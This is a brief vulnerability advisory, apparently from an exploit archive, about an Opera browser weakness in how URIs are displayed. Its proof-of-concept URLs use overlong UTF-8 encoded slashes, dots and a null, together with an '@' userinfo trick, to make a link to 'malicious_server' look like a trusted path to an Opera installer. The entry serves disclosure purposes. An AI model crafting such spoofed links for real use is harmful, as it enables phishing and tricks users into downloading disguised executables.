|
Opera Browser URI Display Obfuscation Weakness
No exploit required. The following proof of concept has been provided: http://www.example.com%C0%AFfake_path%C0%AFfake_filename%C0%AEhtml%C0%80@www.example.com/ http://www.example.com/fake_path/fake_filename.html ftp://ftp.example.com%C0%AFpub%C0%AFopera%C0%AFwin%C0%AF723%C0%AFen%C0%AFstd%C0%AFow32enen723%C0%AEexe%C0%80:password@malicious_server/ow32enen723.exe ftp://ftp.example.com/pub/opera/win/723/en/std/ow32enen723.exe |
|
|
Privacy Statement |
